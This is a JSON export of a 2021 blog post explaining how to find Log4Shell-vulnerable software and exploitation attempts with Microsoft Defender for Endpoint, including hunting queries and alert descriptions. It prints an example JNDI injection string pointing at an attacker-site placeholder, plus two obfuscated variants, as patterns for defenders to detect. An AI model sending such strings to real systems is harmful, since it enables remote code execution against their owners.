{"id":4077,"date":"2021-12-15T00:31:25","date_gmt":"2021-12-14T22:31:25","guid":{"rendered":"https:\/\/jeffreyappel.nl\/?p=4077"},"modified":"2021-12-17T00:26:04","modified_gmt":"2021-12-16T22:26:04","slug":"microsoft-defender-for-endpoint-log4j","status":"publish","type":"post","link":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/","title":{"rendered":"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation"},"content":{"rendered":"<p><strong>One of the most important and trending topics in the last couple of days is related to Log4j, log4shell, and the attached CVE 2021-44228. A zero-day vulnerability (<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228\">CVE-2021-44228<\/a>), publicly released on 9 December 2021 and known as Log4j or Log4Shell, is actively being targeted in the wild. CVE-2021-44228 is assigned in the critical severity rating with a risk score of 10. With this high rating important to take immediate actions and patch vulnerable systems and software packages including Log4j.<\/strong><\/p>\r\n<p><strong>\u00a0Article updated 15 December 2021<\/strong><\/p>\r\n<p>In this blog all the details about Log4J \/ CVE-2021-44228 detection with Microsoft Defender for Endpoint (MDE). Important to visit the <a href=\"https:\/\/msrc-blog.microsoft.com\/\" rel=\"home\">Microsoft Security Response Center<\/a> blog. For reading all the detailed information and possible detection use-cases. See: <a href=\"https:\/\/msrc-blog.microsoft.com\/2021\/12\/11\/microsofts-response-to-cve-2021-44228-apache-log4j2\/\">Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j<\/a><\/p>\r\n<h2>Why is Log4J, log4shell, CVE-2021-44228 important?<\/h2>\r\n<p>The vulnerability CVE-2021-44228 referred to as Log4Shell affects Java-based applications that use Log4J 2 version 2.0 through 2.14.1. \u00a0<a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/\">Log4j 2<\/a> is a Java-based logging library that is widely used in the wild and included in open-source libraries and embedded in software applications. With this &#8211; the scope is high and includes thousands of software applications. Java is cross-platform and the Java library is used in many solutions. Important to track applications and patch directly to the latest security updates. Read the application vendor site for more details and available updates.<\/p>\r\n<p class=\"\">An example pattern of attack would appear in a web request log with strings like the following: ${jndi:ldap:\/\/[attacker site]\/a}<\/p>\r\n<p>The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface.<\/p>\r\n<p>This blog will focus mostly on the Defender for Endpoint (MDE) side and not technical in-depth on Log4j. Some recommended sources for more in-depth Log4j information:<\/p>\r\n<ul>\r\n<li><a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/changes-report.html#a2.16.0\">Apache &#8211; Release 2.16.0<\/a><\/li>\r\n<li dir=\"auto\"><a href=\"https:\/\/www.govcert.ch\/blog\/zero-day-exploit-targeting-popular-java-library-log4j\/\">Govcert.ch Zero Day Exployst targeting popular Java Library Log4<\/a>j<\/li>\r\n<li dir=\"auto\"><a href=\"https:\/\/www.sekoia.io\/en\/log4shell-the-defenders-worst-nightmare\/\">Log4Shell: the defender\u2019s worst nightmare?<\/a><\/li>\r\n<li><a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi\">MITRE &#8211; CVE-2022-44228\u00a0<\/a><\/li>\r\n<li><a href=\"https:\/\/msrc-blog.microsoft.com\/2021\/12\/11\/microsofts-response-to-cve-2021-44228-apache-log4j2\/\">Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2<\/a><\/li>\r\n<li><a href=\"https:\/\/www.youtube.com\/watch?v=oC2PZB5D3Ys&amp;feature=youtu.be&amp;ab_channel=SANSInstitute\">SANS: What do you need to know about the log4j vulnerability? (YouTube)<\/a><\/li>\r\n<\/ul>\r\n<p><strong>Twitter<\/strong><\/p>\r\n<ul>\r\n<li><a href=\"https:\/\/twitter.com\/GossiTheDog\">GossiTheDog \/ Kevin Beaumont<\/a><\/li>\r\n<li><a href=\"https:\/\/twitter.com\/cyb3rops\">Cyb3rops \/ Florian Roth<\/a><\/li>\r\n<\/ul>\r\n<hr \/>\r\n<h2>Get software TVM insights with Microsoft Defender for Endpoint<\/h2>\r\n<p>The first step is getting insights into the application scope and affected software packages\/ devices. With the usage of Microsoft Defender for Endpoint (MDE), it is possible to use the vulnerability and software data based on Threat and Vulnerability Management (TVM).<\/p>\r\n<h3>Detect systems with Log4j installed<\/h3>\r\n<p>For detecting systems with the Log4j components use the Software Inventory data and discover for the SoftwareName &#8220;log4j&#8221;. Log4j is the main component. Using Advanced Hunting is the most flexible way for building some more advanced queries and combinations:<\/p>\r\n<p>Use the query for discovering where the software name contains <strong>Log4j<\/strong>.\u00a0<\/p>\r\n\r\n<pre class=\"wp-block-code\"><code>\/\/Vulnerable software on endpoints\r\nDeviceTvmSoftwareInventory\r\n| where SoftwareName contains \"Log4j\"\r\n| project DeviceName, SoftwareName, SoftwareVersion<\/code><\/pre>\r\n\r\n<p>Which gives the result:\u00a0<\/p>\r\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone wp-image-4082\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-31-37.png\" alt=\"\" width=\"708\" height=\"337\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-31-37.png 1827w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-31-37-300x143.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-31-37-1024x486.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-31-37-768x365.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-31-37-1536x730.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-31-37-585x278.png 585w\" sizes=\"(max-width: 708px) 100vw, 708px\" \/><\/p>\r\n<p>&nbsp;<\/p>\r\n<h3>Detect software including Log4j and single Log4j packages<\/h3>\r\n<p>Software packages can contain the Log4J binary which is difficult to discover. Multiple applications are using the Log4J binary built-in. For resolving the CVE, the vendor must be release new patches.\u00a0<\/p>\r\n<p>For example software like; iCloud client (patched), <a href=\"https:\/\/www.splunk.com\/en_us\/blog\/bulletins\/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html\">Splunk<\/a>, <a href=\"https:\/\/kb.vmware.com\/s\/article\/87081\">Vcenter<\/a>, <a href=\"https:\/\/discuss.elastic.co\/t\/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31\/291476\">Logstash<\/a> are vulnerable for some specific versions. View <a href=\"https:\/\/github.com\/NCSC-NL\/log4shell\">NCSC-NL Github<\/a> for additional software information for more applications and vendors.\u00a0<\/p>\r\n<p>Microsoft is increasing TVM detection with more applications included.\u00a0Detection is possible based on the TVM data and CVE number. For detecting software follow the below steps:<\/p>\r\n<ol>\r\n<li>Go to <strong>security.microsoft.com<\/strong><\/li>\r\n<li>Open <strong>Vulnerability management <\/strong>-&gt;<strong> Weaknesses<\/strong><\/li>\r\n<li>Search for <strong>CVE-2021-44228<\/strong><\/li>\r\n<\/ol>\r\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-4078\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_00-32-50.png\" alt=\"\" width=\"2521\" height=\"1382\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_00-32-50.png 2521w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_00-32-50-300x164.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_00-32-50-1024x561.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_00-32-50-768x421.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_00-32-50-1536x842.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_00-32-50-2048x1123.png 2048w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_00-32-50-585x321.png 585w\" sizes=\"(max-width: 2521px) 100vw, 2521px\" \/><\/p>\r\n<h3><strong>Advanced Hunting<\/strong><\/h3>\r\n<p>Advanced hunting makes it easier to attach more combinations based on MDE data. Below basic query for CVE-2021-44228 detection.\u00a0<\/p>\r\n\r\n<pre class=\"wp-block-code\"><code>\/\/Vulnerable software on endpoints\r\nDeviceTvmSoftwareVulnerabilities\r\n| where CveId contains \"CVE-2021-44228\"\r\n| distinct DeviceName, OSPlatform, SoftwareVendor, SoftwareName, SoftwareVersion, RecommendedSecurityUpdate, RecommendedSecurityUpdateId<\/code><\/pre>\r\n\r\n<p>Which gives the result:\u00a0<\/p>\r\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-4090\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-25-06.png\" alt=\"\" width=\"1968\" height=\"784\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-25-06.png 1968w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-25-06-300x120.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-25-06-1024x408.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-25-06-768x306.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-25-06-1536x612.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-25-06-585x233.png 585w\" sizes=\"(max-width: 1968px) 100vw, 1968px\" \/><\/p>\r\n<p>And applications used which not patched against CVE-2021-44228:\u00a0<\/p>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4091\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-27-20.png\" alt=\"\" width=\"1923\" height=\"854\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-27-20.png 1923w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-27-20-300x133.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-27-20-1024x455.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-27-20-768x341.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-27-20-1536x682.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-27-20-585x260.png 585w\" sizes=\"(max-width: 1923px) 100vw, 1923px\" \/><\/p>\r\n<p>&nbsp;<\/p>\r\n<hr \/>\r\n<h2><strong>Microsoft defender for Endpoint Threat Analytics report<\/strong><\/h2>\r\n<p>Microsoft published the Threat analytics reports inside Microsoft Defender for Endpoint. The analytics report provides information in multiple tabs. For viewing the MDE analytics report:<\/p>\r\n<ol>\r\n<li>Go to <strong>security.microsoft.com<\/strong><\/li>\r\n<li>Open <b>Theart analytics<\/b><\/li>\r\n<li>Search for <strong>CVE-2021-44228\/ Log4j\u00a0<\/strong><\/li>\r\n<li>For the direct threat analytics page: <a href=\"https:\/\/security.microsoft.com\/threatanalytics3\/a41971d4-cf8b-4fcf-946e-bd042229e8fa\/overview\">https:\/\/security.microsoft.com\/threatanalytics3\/a41971d4-cf8b-4fcf-946e-bd042229e8fa\/overview<\/a><\/li>\r\n<\/ol>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4095\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png\" alt=\"\" width=\"2685\" height=\"1092\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png 2685w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33-300x122.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33-1024x416.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33-768x312.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33-1536x625.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33-2048x833.png 2048w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33-585x238.png 585w\" sizes=\"(max-width: 2685px) 100vw, 2685px\" \/><\/p>\r\n<p>Based on the threat analytics details the related incidents are visible, impacted assets, and more technical details. The page contains the following details:<\/p>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4083\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-41-46.png\" alt=\"\" width=\"2091\" height=\"373\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-41-46.png 2091w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-41-46-300x54.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-41-46-1024x183.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-41-46-768x137.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-41-46-1536x274.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-41-46-2048x365.png 2048w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-41-46-585x104.png 585w\" sizes=\"(max-width: 2091px) 100vw, 2091px\" \/><\/p>\r\n<ul>\r\n<li><strong>Overview:<\/strong> Summary dashboard of the threat<\/li>\r\n<li><strong>Analyst report:<\/strong> Detailed information including mitigations &amp; advanced hunting queries<\/li>\r\n<li><strong>Related incidents:<\/strong> Incidents part of the threat<\/li>\r\n<li><strong>Impacted assets:<\/strong> Devices discovered as impacted assets<\/li>\r\n<li><strong>Prevented email attempts:<\/strong> When mail data is part of the threat<\/li>\r\n<li><strong>Exposure &amp; mitigations:<\/strong> List of mitigations &amp; vulnerabilities.<\/li>\r\n<\/ul>\r\n<p>&nbsp;<\/p>\r\n<h3>Related incidents<\/h3>\r\n<p>Contains all incidents which are related to the Log4j active exploitation:<\/p>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-4088 \" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-17-01-e1639516681565.png\" alt=\"\" width=\"493\" height=\"345\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-17-01-e1639516681565.png 1260w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-17-01-e1639516681565-300x210.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-17-01-e1639516681565-1024x717.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-17-01-e1639516681565-768x538.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-17-01-e1639516681565-585x410.png 585w\" sizes=\"(max-width: 493px) 100vw, 493px\" \/><\/p>\r\n<h3>Mitigations<\/h3>\r\n<p>Mitigations contain software packages that are vulnerable and detected by Microsoft. Part of the current CVE detection for example:<\/p>\r\n<ul>\r\n<li>Log4j-jcl<\/li>\r\n<li>Symantec Endpoint Protection Manager<\/li>\r\n<li>log4j over slf4j<\/li>\r\n<li>Apache log4j2<\/li>\r\n<li>Splunk<\/li>\r\n<li>Steam<\/li>\r\n<\/ul>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4097\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-28-07.png\" alt=\"\" width=\"2480\" height=\"890\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-28-07.png 2480w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-28-07-300x108.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-28-07-1024x367.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-28-07-768x276.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-28-07-1536x551.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-28-07-2048x735.png 2048w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-28-07-585x210.png 585w\" sizes=\"(max-width: 2480px) 100vw, 2480px\" \/><\/p>\r\n<hr \/>\r\n<h2>Process commands in Defender for Endpoint<\/h2>\r\n<p>An attacker performs an HTTP request against their target system which generates a log using Log4j that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability will then cause the exploited process to reach out to the site and execute the payload.<\/p>\r\n<figure id=\"attachment_4103\" aria-describedby=\"caption-attachment-4103\" style=\"width: 1502px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-4103 size-full\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/Attack-chain-diagram-1.png\" alt=\"\" width=\"1502\" height=\"827\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/Attack-chain-diagram-1.png 1502w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/Attack-chain-diagram-1-300x165.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/Attack-chain-diagram-1-1024x564.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/Attack-chain-diagram-1-768x423.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/Attack-chain-diagram-1-585x322.png 585w\" sizes=\"(max-width: 1502px) 100vw, 1502px\" \/><figcaption id=\"caption-attachment-4103\" class=\"wp-caption-text\">Source: <a href=\"https:\/\/msrc-blog.microsoft.com\/2021\/12\/11\/microsofts-response-to-cve-2021-44228-apache-log4j2\/\">MSRC Microsoft<\/a><\/figcaption><\/figure>\r\n<p><strong>Important:<\/strong> attackers have added obfuscation to these requests witch make various combinations possible &#8211; for trying to bypass detections based on the request patterns the following combinations are possible with lower or upper commands.\u00a0<\/p>\r\n<ul>\r\n<li>({jndi:${lower:l}${lower:d}a${lower:p})<\/li>\r\n<li>(${${::-j}${::-n}${::-d}${::-i})<\/li>\r\n<li>&#8230;&#8230;&#8230;<\/li>\r\n<\/ul>\r\n<p>For tracking the process commands below Advanced Hunings queries are useful:\u00a0<\/p>\r\n<p><strong>Important:<\/strong> DeviceProcessEvents will not detect all of them<\/p>\r\n<h3><strong>Detect Process events<\/strong><\/h3>\r\n<p>Below Advanced Hunting query shows the ProcessCommandLine for all events which contain jndi and has any of ldap, ldaps, HTTP, rmi, dns, iiop<\/p>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4084\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-48-58.png\" alt=\"\" width=\"2504\" height=\"1028\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-48-58.png 2504w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-48-58-300x123.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-48-58-1024x420.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-48-58-768x315.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-48-58-1536x631.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-48-58-2048x841.png 2048w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-48-58-585x240.png 585w\" sizes=\"(max-width: 2504px) 100vw, 2504px\" \/><\/p>\r\n<p>&nbsp;<\/p>\r\n<h3>IOC matching<\/h3>\r\n<p>Recommended to use one of the available IOCs lists and match the IOC based on the DeviceNetworkEvents data in MDE. View <a href=\"https:\/\/github.com\/NCSC-NL\/log4shell\/tree\/main\/iocs\">NCSC-NL GitHub<\/a> for available IOCs data sources.\u00a0<\/p>\r\n<p>More Advanced Hunting queries examples<\/p>\r\n<ul>\r\n<li>Microsoft: <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2021\/12\/11\/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation\/\">Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation<\/a><\/li>\r\n<li>Olaf Hartong: <a href=\"https:\/\/gist.github.com\/olafhartong\/916ebc673ba066537740164f7e7e1d72\">https:\/\/gist.github.com\/olafhartong\/916ebc673ba066537740164f7e7e1d72<\/a><\/li>\r\n<\/ul>\r\n<hr \/>\r\n<h2><strong>Defender for Endpoint alerts<\/strong><\/h2>\r\n<p>Defender built some built-in detection rules which can trigger the following alerts, and can indicate threat activity:<\/p>\r\n<ul>\r\n<li>Network connection seen in CVE-2021-44228 exploitation (detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity)<\/li>\r\n<li>Possible exploitation of CVE-2021-44228 (detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation)<\/li>\r\n<li>Possible Log4j exploitation<\/li>\r\n<li>Suspicious script launched (detects multiple behaviors, including suspicious command launch post-exploitation)<\/li>\r\n<\/ul>\r\n<h3><strong>Alert: Possible Log4j exploitation alert<\/strong><\/h3>\r\n<p>In case of possible Log4j exploitation below information is visible directly in MDE. Important to track the alerts with the title: Possible Log4j exploitation<\/p>\r\n<p><strong>incident overview in MDE:\u00a0<\/strong>Detected by detection source: EDR<\/p>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-4086\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-58-37.png\" alt=\"\" width=\"380\" height=\"328\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-58-37.png 1171w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-58-37-300x259.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-58-37-1024x883.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-58-37-768x662.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_21-58-37-585x505.png 585w\" sizes=\"(max-width: 380px) 100vw, 380px\" \/><\/p>\r\n<p><strong>Alert story: <\/strong>Contains the jndi:ldap:\/\/ command and detects possible Log4j exploitation.<\/p>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4089\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-18-45.png\" alt=\"\" width=\"1755\" height=\"202\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-18-45.png 1755w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-18-45-300x35.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-18-45-1024x118.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-18-45-768x88.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-18-45-1536x177.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-18-45-585x67.png 585w\" sizes=\"(max-width: 1755px) 100vw, 1755px\" \/><\/p>\r\n<hr \/>\r\n<h3>Microsoft Sentinel<\/h3>\r\n<p>In case when Microsoft Sentinel is connected with MDE the following events will be visible. A new blog is coming with more focus on Microsoft Sentinel and the detection options with Sentinel.<\/p>\r\n<p><img decoding=\"async\" class=\"i-amphtml-fill-content i-amphtml-replaced-content\" src=\"https:\/\/jeffreyappel-nl.cdn.ampproject.org\/i\/s\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-03-56.png\" sizes=\"(max-width: 2375px) 100vw, 2375px\" srcset=\"https:\/\/jeffreyappel-nl.cdn.ampproject.org\/i\/s\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-03-56.png 2375w, https:\/\/jeffreyappel-nl.cdn.ampproject.org\/i\/s\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-03-56-300x64.png 300w, https:\/\/jeffreyappel-nl.cdn.ampproject.org\/i\/s\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-03-56-1024x218.png 1024w, https:\/\/jeffreyappel-nl.cdn.ampproject.org\/i\/s\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-03-56-768x164.png 768w, https:\/\/jeffreyappel-nl.cdn.ampproject.org\/i\/s\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-03-56-1536x327.png 1536w, https:\/\/jeffreyappel-nl.cdn.ampproject.org\/i\/s\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-03-56-2048x436.png 2048w, https:\/\/jeffreyappel-nl.cdn.ampproject.org\/i\/s\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_22-03-56-585x125.png 585w\" alt=\"\" \/><\/p>\r\n<p>For the Microsoft Sentinel data connection make sure the Defender connector is enabled. Enable one of the below data connections and enable automatic alert creation.\u00a0<\/p>\r\n<ul>\r\n<li>Microsoft Defender for Endpoint<\/li>\r\n<li>Microsoft 365 Defender (Preview)<\/li>\r\n<\/ul>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4121\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-56-45.png\" alt=\"\" width=\"1998\" height=\"1183\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-56-45.png 1998w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-56-45-300x178.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-56-45-1024x606.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-56-45-768x455.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-56-45-1536x909.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-56-45-585x346.png 585w\" sizes=\"(max-width: 1998px) 100vw, 1998px\" \/><\/p>\r\n<p>During the enablement of the connector &#8211;\u00a0 there is a checkbox for enabling Microsoft Defender for Endpoint alerts:<\/p>\r\n<p><strong>Defender for Endpoint connector:<\/strong><\/p>\r\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4123\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-59-31.png\" alt=\"\" width=\"2260\" height=\"340\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-59-31.png 2260w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-59-31-300x45.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-59-31-1024x154.png 1024w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-59-31-768x116.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-59-31-1536x231.png 1536w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-59-31-2048x308.png 2048w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-59-31-585x88.png 585w\" sizes=\"(max-width: 2260px) 100vw, 2260px\" \/><\/p>\r\n<p><strong>Microsoft 365 preview connector:<\/strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-4122\" src=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-58-51.png\" alt=\"\" width=\"548\" height=\"124\" srcset=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-58-51.png 1236w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-58-51-300x68.png 300w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-58-51-1024x232.png 1024w, 